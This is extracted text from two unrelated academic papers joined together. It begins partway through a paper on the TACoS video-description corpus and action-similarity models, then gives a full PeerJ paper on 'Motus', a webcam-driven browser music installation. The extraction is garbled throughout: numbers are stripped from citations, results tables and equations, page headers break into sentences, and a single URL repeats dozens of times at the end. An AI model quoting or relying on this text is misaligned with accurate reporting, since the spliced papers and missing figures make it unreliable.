both visual and textual mea- sures have a highly significant correlation with the gold standard, whereas the combination of both clearly leads to the best performance ( . ). the results on the same object and same verb sub- sets shed light on the division of labor between the two information sources. while the textual mea- sures show a comparable performance over the two subsets, there is a dramatic difference in the contri- bution of visual information: on the same object set, the visual models clearly outperform the textual ones, whereas the visual information has no positive effect on the same verb set. this is clear evidence that the visual model does not capture the similar- ity of the participating objects but rather genuine ac- tion similarity, which the visual features (wang et al., ) we employ were designed for. a direction for future work is to learn dedicated visual object de- tectors to recognize and capture similarities between objects more precisely. the numbers shown in figure support this hy- pothesis, showing the two groups in the same ob- ject class: for sentence pairs that share the same activity, the textual models seem to be much more suitable than the visual ones. in general, visual mod- els perform better on actions with different activity types, textual models on closely related activities. model (same object) same action diff. action t e x t jaccard . . text vectors . . text combined . . v id e o vis. raw vectors . . vis. classifier . . video combined . . m ix all unsupervised . . all combined . . upper bound . . figure : results for sentences with the same object, with either the same or different low-level activity. overall, the supervised classifier contributes a good part to the final results. however, the supervi- sion is not strictly necessary to arrive at a significant correlation; the raw visual features alone are suffi- cient for the main performance gain seen with the integration of visual information. conclusion we presented the tacos corpus, which provides coherent textual descriptions for high-quality video recordings, plus accurate alignments of text and video on the sentence level. we expect the corpus to be beneficial for a variety of research activities in natural-language and visual processing. in this paper, we focused on the task of grounding the meaning of action verbs and phrases. we de- signed the asim dataset as a gold standard and eval- uated several text- and video-based semantic simi- larity models on the dataset, both individually and in different combinations. we are the first to provide semantic models for action-describing expressions, which are based on information extracted from videos. our experimen- tal results show that these models are of considerable quality, and that predictions based on a combination of visual and textual information even approach the upper bound given by the agreement of human an- notators. in this work we used existing similarity models that had been developed for different applications. we applied these models without any special train- ing or optimization for the current task, and we com- bined them in the most straightforward way. there is room for improvement by tuning the models to the task, or by using more sophisticated approaches to combine modality-specific information (silberer and lapata, ). we built our work on an existing corpus of high- quality video material, which is restricted to the cooking domain. as a consequence, the corpus cov- ers only a limited inventory of activity types and ac- tion verbs. note, however, that our models are fully unsupervised (except the visual classifier model), and thus can be applied without modification to ar- bitrary domains and action verbs, given that they are about observable activities. also, corpora contain- ing information comparable to the tacos corpus but with wider coverage (and perhaps a bit noisier) can be obtained with a moderate amount of effort. one needs videos of reasonable quality and some sort of alignment with action descriptions. in some cases such alignments even come for free, e.g. via subti- tles, or descriptions of short video clips that depict just a single action. for future work, we will further investigate the compositionality of action-describing phrases. we also want to leverage the multimodal information provided by the tacos corpus for the improvement of high-level video understanding, as well as for generation of natural-language text from videos. the tacos corpus and all other data described in this paper (videos, low-level annotation, aligned tex- tual descriptions, the asim-dataset and visual fea- tures) are publicly available. acknowledgements we’d like to thank asad sayeed, alexis palmer and prashant rao for their help with the annotations. we’re indebted to carl vondrick and marco an- tonio valenzuela escrcega for their extensive sup- port with the video annotation tool. further we thank alexis palmer and in particular three anony- mous reviewers for their helpful comments on this paper. – this work was funded by the cluster of ex- cellence “multimodal computing and interaction” of the german excellence initiative and the dfg project schi / - . http://www.coli.uni-saarland.de/ projects/smile/page.php?id=tacos references luis von ahn and laura dabbish. . labeling images with a computer game. in proceedings of sigchi . elia bruni, giang binh tran, and marco baroni. . distributional semantics from text and images. in pro- ceedings of gems . david l. chen and william b. dolan. . collect- ing highly parallel data for paraphrase evaluation. in proceedings of acl . timothee cour, chris jordan, eleni miltsakaki, and ben taskar. . movie/script: alignment and parsing of video and text transcription. in computer vision – eccv , volume of lecture notes in com- puter science, pages – . springer berlin heidel- berg. ido dagan, oren glickman, and bernardo magnini. . the pascal recognising textual entailment challenge. in proceedings of mlcw . jesse dodge, amit goyal, xufeng han, alyssa men- sch, margaret mitchell, karl stratos, kota yamaguchi, yejin choi, hal daumé iii, alexander c. berg, and tamara l. berg. . detecting visual text. in hlt- naacl, pages – . katrin erk and diana mccarthy. . graded word sense assignment. in proceedings of emnlp . katrin erk, diana mccarthy, and nicholas gaylord. . investigations on word senses and word usages. in proceedings of acl/afnlp . katrin erk, diana mccarthy, and nick gaylord. . measuring word meaning in context. cl. yansong feng and mirella lapata. . visual infor- mation in semantic representation. in proceedings of hlt-naacl . a. m. glenberg. . grounding language in action. psychonomic bulletin & review. sonal gupta and raymond j. mooney. . us- ing closed captions as supervision for video activ- ity recognition. in proceedings of the twenty-fourth aaai conference on artificial intelligence (aaai- ), pages – , atlanta, ga, july. abhinav gupta, praveen srinivasan, jianbo shi, and larry s. davis. . understanding videos, con- structing plots learning a visually grounded storyline model from annotated videos. in proceedings of cvpr . steve r. howell, damian jankowicz, and suzanna becker. . a model of grounded language ac- quisition: sensorimotor features improve lexical and grammatical learning. jml. s. mathe, a. fazly, s. dickinson, and s. stevenson. . learning the abstract motion semantics of verbs from captioned videos. pages – . jeff mitchell and mirella lapata. . vector-based models of semantic composition. in proceedings of acl . tanvi s. motwani and raymond j. mooney. . im- proving video activity recognition using object recog- nition and text mining. in proceedings of the th european conference on artificial intelligence (ecai- ), pages – , august. jeff orkin and deb roy. . automatic learning and generation of social behavior from collective human gameplay. in proceedings of aamas . hilke reckman, jeff orkin, and deb roy. . ex- tracting aspects of determiner meaning from dialogue in a virtual world environment. in proceedings of ccs , iwcs ’ . marcus rohrbach, sikandar amin, mykhaylo andriluka, and bernt schiele. a. a database for fine grained activity detection of cooking activities. in proceedings of cvpr . marcus rohrbach, michaela regneri, micha andriluka, sikandar amin, manfred pinkal, and bernt schiele. b. script data for attribute-based recognition of composite activities. in proceedings of eccv . carina silberer and mirella lapata. . grounded models of semantic representation. in proceedings of emnlp-conll . mark steyvers. . combining feature norms and text data with topic models. acta psychologica, ( ): – . ¡ce:title¿formal modeling of se- mantic concepts¡/ce:title¿. stefan thater, hagen fürstenau, and manfred pinkal. . word meaning in context: a simple and effec- tive vector model. in proceedings of ijcnlp . peter d. turney and patrick pantel. . from fre- quency to meaning. vector space models for semantics. jair. e. tzoukermann, j. neumann, j. kosecka, c. fermuller, i. perera, f. ferraro, b. sapp, r. chaudhry, and g. singh. . language models for semantic ex- traction and filtering in video action recognition. in aaai workshop on language-action tools for cogni- tive artificial agents. carl vondrick, donald patterson, and deva ramanan. . efficiently scaling up crowdsourced video an- notation. ijcv. heng wang, alexander kläser, cordelia schmid, and cheng-lin liu. . action recognition by dense trajectories. in proceedings of cvpr . an interactive audio-visual installation using ubiquitous hardware and web-based software deployment submitted march accepted may published may corresponding author tiago fernandes tavares, tavares@dca.fee.unicamp.br academic editor sally jo cunningham additional information and declarations can be found on page doi . /peerj-cs. copyright tavares distributed under creative commons cc-by . open access an interactive audio-visual installation using ubiquitous hardware and web-based software deployment tiago fernandes tavares school of electrical and computer engineering, university of campinas, brazil abstract this paper describes an interactive audio-visual musical installation, namely motus, that aims at being deployed using low-cost hardware and software. this was achieved by writing the software as a web application and using only hardware pieces that are built-in most modern personal computers. this scenario implies in specific technical restrictions, which leads to solutions combining both technical and artistic aspects of the installation. the resulting system is versatile and can be freely used from any computer with internet access. spontaneous feedback from the audience has shown that the provided experience is interesting and engaging, regardless of the use of minimal hardware. subjects human–computer interaction, multimedia keywords audio-visual interaction, computer music, webcam introduction artistic interactive musical installations, like aether (sanchez & castro, ) and intrium (guisan, ), are devices that allow an audience to interact with a sonic environment or musical concept using electronic sensors. in some cases, the installation is built as to augment the interaction between the public and an specific environment, as the well-known piano staircase (thefuntheory, ), an installation in which each step in a staircase was behaved like the key of a piano, thus causing music to be played when the audio went downstairs and upstairs. more recently, modern motion sensors allowed achieving new possibilities of musical performance and interaction (jung et al., ; chen, maeda & takahashi, ) by mapping movements into musical responses. interactive musical devices present both artistic and technological challenges (garnett, ). they create the possibility of generating music according to a dance, instead of constraining dance to a pre-defined musical piece (morales-manzanares et al., ). hence, they bring to the public a technology-enabled experience that is perceptively different from simply listening to music or dancing to a recording. nevertheless, most installations are expensive artifacts that must be mounted by a well-trained team. this causes their cultural experience to be restricted to specific environments, such as art galleries, museums or particular events. therefore, the cultural transformation derived from the interaction with a novel music concept has a limited audience range. how to cite this article tavares ( ), an interactive audio-visual installation using ubiquitous hardware and web-based software deployment. peerj comput. sci. :e ; doi . /peerj-cs. mailto:tavares@dca.fee.unicamp.br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the installation proposed in this article, namely m, aims at being deployed for a broad public. this is achieved by combining a web-deployed software stack, little hardware requirements and simple, yet engaging, methods for interaction. as a result, the experience provided by m is made accessible for any person with an internet connection and a laptop with a webcam. the installation uses a camera as a sensor device, and a simple motion detection algorithm (wirayuda et al., ) to characterize the audience’s movements. the musical generation, based on markov chains (schulze & van der merwe, ; pachet, ; cope, ), aims at converting the detected movement intensity into the intensity of the musical manifestation without requiring previous musical knowledge from the audience. the installation software also comprises auditory and visual feedback, which may use the laptop’s hardware (screen and speakers) or external devices such sound reinforcement systems and projectors. the remainder of this article is organized as follows. first, related work is presented in ‘related work,’ followed by a discussion about the artistic concepts behind the development of m in ‘artistic concept.’ in ‘the installation,’ m is thoroughly described both from the artistic and the technical points of view. further discussion, based on interactions with the audience, is conducted in ‘audience feedback and discussion.’ last, ‘conclusion’ brings conclusive remarks. related work a great number of interactive art installations has been constructed in the last decade. each one of them implements an underlying purpose, which is often discussed in academic publications. some are especially related to m, as it will be discussed below. birchfield et al. ( ) brought forward the question of placement of an installation, and its impact on the usage of a public space. after implementing sonification of a bus stop in a busy street, they observed that the general public often feels self-conscious about producing sounds in this environment. henceforth, audience engagement is an important, non-trivial issue to be considered in installations. a possible technique to achieve audience engagement is to develop a specific space for the installation, providing both auditory and visual stimuli (kobori et al., ; seo & corness, ). however, as observed in the piano staircase (thefuntheory, ), audience engagement may happen even if the installation is placed in a public space. this indicates that the placement of the installation does not cause audience engagement alone. in the evaluation of the interactive dance installation hoppsa universum (kallblad et al., ), it has shown that is audience perception was frequently described with expressions like it was fun or be with friends. later, schacher ( ) noted that the audience engagement is related to the fast understanding of the interaction model, which may restrict the usage of more complicated interfaces or algorithms. morreale, masu & angeli ( ) presented an algorithm, namely robin, capable of generating piano music from the spatial position of members of the audience. the algorithm uses a rule-based system that models western piano style music, and may tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. be used by untrained (non-musician) members of the audience. it was presented in an installation that was well-evaluated, with great acceptance ratios. m considers all of these aspects, but, unlike the work discussed above, it does not require special hardware (other than that present in most current laptops) or preparations to be used. it aims at being easily used, including by untrained audience, which reflects on the simplicity of its interaction model and its software is deployed as a web application, thus it can be readily used in private spaces. m is thoroughly described in the next section. artistic concept m was first idealized from the idea of converting movements to music using a camera. its name comes from the latin word that means “motion.” this section describes the artistic concepts over which it was constructed. the musical concept behind m was derived from improvised genres, like free jazz and some styles of ethnic drum circles. during an improvisation session, it is important to perceive the other members of the ensemble and create some form of communication with them. in this context, elements such as harmony and rhythm may be transformed to fit the communication process that emerges in each session. according to the model presented by dubberly, pangaro & haque ( ), this type of interaction is mediated by the intention of each agent. this means that the correspondence to an intention is, for the improvisation group, more important than the achievement of technical precision. therefore, m uses a music generation model that responds to the audience intention. for the construction of the interactive system, this intention must be assigned to control a measurable aspect of the generated music. since m is intended to be used by an untrained audience, the musical aspect controlled by the audience’s intention must be simple to understand. for this reason, the audience’s intention was assigned to control the musical intensity. to evaluate the audience’s intention using the webcam, it was necessary to estimate the intensity of captured movements. instead of mapping particular movements to specific sonic representations, a general movement intensity was measured using pixel-by-pixel differences. this allows the audience to explore not only the interaction with m, but also the diverse possibilities of using their bodies, interacting with friends or using objects. with the goal of inducing broader movements, the video area was divided into different regions, each related to a sonic representation. the audience can visualize the video feed, with a color scheme that highlights the regions that are most active. in addition to the aesthetic appeal, this feedback helps understanding the interaction process. for this same reason, piano sounds were used for audio rendering. they have the goal of being easy to recognize, as most of the general audience (at least in western countries) is familiar with the instrument. the installation is described from a more technical point of view in the next section. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure installation overview. the installation the main concern when developing m was that it could be used by as many people as possible. steps towards this goal were taken by requiring as little external hardware as possible and by deploying the software as a web application. the hardware necessary to mount the installation was restricted to that available in a common laptop, i.e., a webcam, a video screen and internal speakers, leading to an overall system as described in fig. . the deployment problem can be solved by using javascript as the main programming language. it can be used to deploy the application directly on a host web browser. however, this choice also poses a performance restriction, as javascript applications are usually slow when compared to native (compiled) programs. on the artistic side, the concept behind m is that it should convert movement to music. this conversion means that user movements should trigger a musical response, and more intense movements should correspond to a more intense musical response. therefore, two subsystems are necessary: one comprising a movement detection algorithm and another one containing a musicological model that generates musical responses. also, it quickly became clear that a video feedback of the detection process could improve the audience’s experience. this happens because the visual information allows the user to understand and appropriate their interaction with a novel musical device. as a result, a greater level of immersion could be provided. therefore, m can be detailed in a block diagram as shown in fig. . all blocks in gray are software, and will be executed within the computer shown in fig. . the following sub-sections will present a thorough description of the movement detection, video rendering, the musicological model and the audio rendering system. movement detection the movement detection process applied in m is very simple, as the web-based implementation does not allow for computationally demanding algorithms. the algorithm begins with the calculation the value vp of each pixel p as the sum of its red, green and blue channels, as it is a common practice in computer vision algorithms (szeliski, ). hence, it may be expressed by: vp = rp + gp + bp. ( ) tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure block diagram describing the installation. in this algorithm, it is more important to detect the intensity of movements than the precise movement location. such a parameter can be estimated using the mean absolute difference between the pixel values in a frame t and those in the previous frame t − (moeslund, ), that is: µ[t] = p p= |vp[t] − vp[t − ]| p , ( ) where p is the number of pixels in the frame. calculating the amount of movement in the whole video feed, however, does not allow placing different interaction with the installation when performing different types of movements. therefore, the video input was first split into four different partitions. each partition had its own movements intensity estimation, and, as will be seen later, is related to a different part of the interaction experience. in preliminary tests, it was noticed that µ[t] changes too quickly, which gives an impression of chaos and lack of control. hence, it was necessary to apply a filter to each µt signal before using it for further purposes. an attack-release filter was applied, using the following expression: µ̂[t] =  αµ[t] + ( − α)µ̂[t − ] if µ[t] > µ̂[t − ] βµ[t] + ( − β)µ̂[t − ] if µ[t] ≤ µ̂[t − ]. ( ) the attack-release filter acts as a low-pass filter whose cut-off frequency is different whether the input signal is higher or lower than the last output. higher values for the α and β coefficients correspond to shorter attack and release times, respectivelly. they were manually adjusted so that the resulting interaction was smooth as desired. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. hence, the result of the movement detection process is a set of four movement estimates µ̂[t], one for each partition. this result was used both in the musicological model and the video rendering process, as it will be discussed later. video rendering the visual feedback provided by m aims at two correlated but different goals. the first is to yield feedback on what the system is doing; that is, what is being detected. the second is to make the audience experience more immersive and engaging. three dimensions of the system’s inner mechanisms were chosen to be conveyed: the captured image values vp as in expression ( ), the differences between the current frame and the previous frame (|vp[t] − vp[t − ]|) and the final detected movement intensity in each partition µ̂[t] as in expression ( ). to allow the audience to clearly visualize each aspect of the interaction, these parameters were mapped to different colors. these colors were arbitrarily chosen to be blue, red and green, which colored the feedback video creating a particular aesthetic environment. as stated before, the values of each frame were mapped to the blue channel of the feedback video. the blue color, then, becomes dominant at almost all times, which gives the installation a general feeling of blue. as a consequence, blue is a color related to musical rest. each pixel’s absolute difference to the previous frame was mapped to the red channel. this caused a red “ghost” to appear in point where strong movements were detected, indicating that an interaction was detected. this piece of visual feedback is bounded to the user and became subtle when compared to other cues. the amount of movement µ̂[t] in each frame partition was mapped to the green channel of the corresponding pixels. this aimed at helping the audience to relate movements to sounds, as a particular category of sonic responses would be clearly correlated to specific blinks in a region of the screen. this piece of visual feedback is strongly correlated to the musicological model employed, as it will be seen below. a screenshot of the video feedback in action is shown in fig. , converted to gray scale to ensure visibility in printed media. as it can be seen, screen areas in which there is more movement are highlighted, and it is possible to visualize both the body movement detection and the activation of screen areas related to musical responses. thus, the audience’s impact on the audiovisual environment is easily visualized. musicological model the generation of musical sequences was done by means of four musicological models, each receiving as input the amount of movement of a different video partition. in all cases, the model should yield a musical manifestation that is perceived as more intense when movements in that partition are more intense. also, this correlation should be perceived almost immediately. in addition to that, the models were built so that no strong sensation of downbeat would emerge, hence avoiding inducing the audience to perform known popular dance moves and favoring the exploration of different body movements. the sensation of tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure screenshot of the video render. closure commonly found in tonal music (e.g., in i–iv–v–i sequences) was also avoided, preventing the comparison of the generated music with known pieces, also favoring experimentation. to keep the interaction more interesting, each partition was bounded to a different musicological behavior, which aimed at inducing the audience to explore the whole interactive space. an aesthetic choice that fits all of these requirements was to make all models yield sequences of musical notes, which is a musical paradigm that is easily recognized by most of the audience. when the sequences are required to be more intense, their notes were increasingly faster and louder. in order to make all musicological models yield sequences that sounded as part of the same piece, they were all bounded to the same octatonic scale, and differences were added on the way each model creates a path within that scale. as shown in fig. , each generative system is independent from the others. they correspond to four different voices, namely upper, middle, harmony and bass. all of them yield note sequences, which will be later rendered. one sequence generation model applied relies on a markov chain (cope, ), adjusted so that the next note is equally likely to be equal to the previous note, a step down or a step up the scale. this model was used in the upper and the middle voices, which were also restricted to particular note ranges. the note range restriction allows users to quickly recognize each one of the voices. the other sequence generation model was the purely random choice. in the lower voice, a random note from the scale (within the range restriction) was yielded at each interaction. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure block diagram for the musical interactivity. in the harmony voice, two random notes from the scale (also within the range restriction) were yielded at each time. all four voices had different functions to transform the input (movement intensity in the corresponding partition) into values of note speed and loudness, so that more intense movements are mapped to faster and louder notes. these functions were manually adjusted to provide a balanced auditory response related to each space partition, as well as an interesting experience. in all cases, it has proved to be interesting to have a lower bound filtering on the input below which it is considered as noise and does not produce any sonic response. as a result, m quickly responds to the audience’s actions. it yields a sequence of notes that are almost always dissonant and out of sync related to each other. nevertheless, the note sequences aim to be perceived as correlated to the audience’s movements. this design fits the employed technology (javascript), as it is known for having a bad timing mechanism in current implementations. as note lengths are continuous and not bounded to the notes in other voices, the lack of synchronization does not harm the final result. this also allowed the audio rendering process to be performed by independent agents, as it will be discussed below. audio rendering the audio rendering process was based on agents that receive pitch, loudness and duration information from the note sequence generated by the musical models. when a note is finished (i.e., its duration has expired), the system proceeds to render the next note (or notes, in the case of the harmony voice), and so on. to keep the interactivity process in real tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. time, the note generation and rendering processes must be synchronized, so that a request for a new note triggers its calculation. since this system should be easy to understand, it was chosen that all voices would be rendered as a piano sound, using sampling. this way, it was expected that the majority of the audience would be able to identify the sounds that came from the system, even when bad speakers are used. the rendering system was implemented using a ready-made sequencing library (midi.js). after built, the system was tested both on online and live audiences. this process provided a rich feedback, as will be discussed below. audience feedback and discussion m was displayed both online and for live audience, which are respectively discussed in ‘online’ and ‘live.’ these are very different situations, as a live context demands a dedicated space for people to move without harming others, a stronger audio system that is capable of competing with other environmental sounds and a screen that allows visualization from a few meters of distance. this is not the case for online displays, which can be visualized from one’s living room or office, thus requiring a less powerful hardware. online for the online interactions, the system was advertised on social networks, and feedback was obtained both spontaneously and from an optional evaluation form. the questions in the form were: . do you play musical instruments and/or sing? (multiple choice: no, and i am not interested; no, but i would like to; yes, casually; yes, frequently; yes, professionally) . do you dance? (multiple choice: no, and i am not interested; no, but i would like to; yes, casually; yes, frequently; yes, professionally) . what audio device did you use in the interaction? (multiple choice: no sound; embedded laptop or desktop audio; small computer speakers; headphones; big audio system or surround) . what screen did you use in the interaction? (multiple choice: no screen; computer or laptop screen; big screen or projector) . how do you evaluate your interaction with m? (multiple choice: not interesting, a little interesting, very interesting, extremely interesting) . describe how was your interaction with m (optional, open question) . what would you change or add in m? (optional, open question) . select from the items below what would you like to do with m in the future. (multiple choice, multiple answers: keep interacting; recommend to friends; download as a mobile app; contribute to next version; other) . please, provide any other feedback you find relevant. in total, volunteer subjects responded the questionnaire, and the majority ( ) classified m as “very interesting” or “extremely interesting” for question . although tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure interest in mot u s according to audio hardware. “other” refers to one subject that reported using a mobile device for the interaction. this shows the device was well evaluated, it is also interesting to highlight the conditions that lead to this evaluation. therefore, these results were jointly analyzed with the answers regarding the hardware used by each subject and their prior interest in dance and music. as it will be seen, no subject classified m as “not interesting.” this is an encouraging result, but can mean that uninterested subjects simply chose not to answer the questionnaire. nevertheless, provided answers gave important insight about the audience’s usage and perception of the installation. figure shows the number of subjects with each type of audio reproduction hardware, grouped by their reported interest in m (all subjects reported using their default screen for the interaction). it may be noted that using laptop (embedded) speakers did not harm the interaction. on the other hand, no subject using headphones reported m as “extremely interesting,” which can indicate that full body movements are an important part of the experience. data indicates that m was successfully deployed over the web and using ubiquitous hardware, as it was designed for. according to the audience, the use of minimal hardware does not harm the overall experience. however, it is important to detect which aspects impact the subjects’ reported interest level. to detect that, the reported interest levels were grouped according to the subjects’ prior interest in dancing or playing instruments and singing, as shown in fig. . gathered data shows that users with a greater interest in dancing tend to report a greater interest in m, but a similar behavior is not observed when considering their interest in playing instruments or singing. this is another evidence that performing body movements is related to a more interesting experience with the installation. all the subjects chose at least one option from question . this shows that possibilities for future use were considered. as shown in table , most subjects would like to keep interacting or recommend to friends, which are indicators of a positive experience with the installation. the answers with “other” regarded using m in different tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure interest in motus according to frequency of artistic activities. table number of times each option in question was chosen. action votes keep interacting recommend to friends download as mobile app contribute to next version other situations—in a classroom and using a video feed from a landscape—which also points at a positive experience. the experience description (related to question ) showed that most subjects first engaged an exploratory stage, in an attempt to detect the rules governing m, and then started applying their own repertoire to the interaction. according to the reports, the exploration of own sensations and body movements tended to generate more pleasant tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. experiences than attempts to generate specific musical movements. the musical generation was perceived as simple, as most subjects were able to quickly understand it. the majority of the suggestions for future work provided as an answer to question point toward changing the installation’s musicological model. also, each suggestion was very different from the others, for example: “add more instruments,” “i tried to play the blues” and “i don’t like the way notes fade out.” this is an indication that the musicological model, and probably the screen division for interaction, should be freely composed by users, possibly sharing their results. almost all comments regarding the interaction with the webcam related to the division of the screen. again, each user had a different suggestion, including increasing the number of divisions and constructing neutral areas that could be used to silently move between other areas. only one comment suggested the use of a finer motion acquisition algorithm, allowing finger positions to be detected. the spontaneous feedback was obtained by messages sent by e-mail and social networks. most of it manifested pleasant surprises, as the presence of such a web application was found to be new. they also provided interesting comments regarding the online interaction. the most common one was a desire to record the interaction and share it on social networks. in an extreme case, a user posted a screenshot online of the visual feedback. this was not implemented in the system, but the demand clearly states a direction for future work. there was also a demand for porting the system for mobile environments. this is not possible at this moment because of the reduced processing power of mobile devices. however, it wasn’t tested how the algorithm would behave if implemented as a native application. interestingly, some online users did not allow m to use their camera, hence harm- ing the experience. this happened because the system was mistaken for privacy-invading malware. a more informative website may be used in the future to prevent this from happening. live when shown live, m was mounted using a big screen for video feedback (either a screen or a projector, depending on the venue) and an amplifier for audio playback. it was granted that there would be some free space for movements (as much as possible, which also depended on the venue). care was taken so that the camera was pointed towards somewhere with no accidental movements (e.g., people passing by or strong shadings from outside) and with a more or less uniform illumination, allowing the camera to work properly. it was found that the interaction with the system made a small part of the audience too self-conscious to engage in participation. two possibilities for that are the mirror characteristic of the visual feedback and the tendency of executing random movements in a public space. however, this was not true for everyone. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. part of the audience quickly engaged on exploring the limits within the sonic response of the installation could be controlled. they tended to approach the camera and perform finer arm and hand movements. some manifested the sensation of playing an imaginary spatial piano. the more extroverted part of the audience quickly engaged on exploring different body movements. an interesting interaction appeared when groups of people started interacting with the system together, which is perfectly possible due to the nature of the movement detection algorithm. these interactions generally took a longer time and were usually comprised of smiles and laughter. finally, an interesting manifestation was given by the audience, especially those who previously played musical instruments. they clearly manifested frustration with the lack of control possibilities in the interaction, as the same movement is not always related to the exact same musical response. also, there were comments on the simplicity of the interaction process, which made it boring after a few minutes of exploration. although ambient lighting is usually a problem in camera-based movement detection systems, it was found that the system is robust to many different conditions. the system worked under different lighting conditions and presented adequate behavior except when lights blinked. however, the interaction experience was slightly changed depending on the colors of the background and the clothes of the audience. conclusion this paper described m, a digital interactive audio-visual installation that requires only hardware that is available in most computer and has its software deployed as a web application. the aesthetic concept behind the system is that it should convert movement to music. these premises—the technical deployment and the desired artistic result—led to a series of design and aesthetic decisions, which are thoroughly described. m was shown in live performances, as well as in a website. feedback was collected from the audience using a questionnaire and by spontaneous comments, which allowed to evaluate how the interaction with the system happened. it was found that this interaction was, most of the times, positive, but sometimes found not very engaging as it doesn’t allow many musical aspects to be explored. it can be accessed at http://www.dca.fee.unicamp.br/∼tavares/auxiliary material/ motus/index.html, and can be freely used by anyone. currently, it requires the google chrome browser. the source code is also available online, at https://github.com/tiagoft/ motus. the installation system is ready to be presented for large audiences, and there seem to be two clear directions for future work. the first is to allow recording of audio and video, as well as sharing of this content in social networks. the second is allow users to compose and share their own interaction models, with a broader range of musical material. tavares ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html http://www.dca.fee.unicamp.br/~tavares/auxiliary_material/motus/index.html 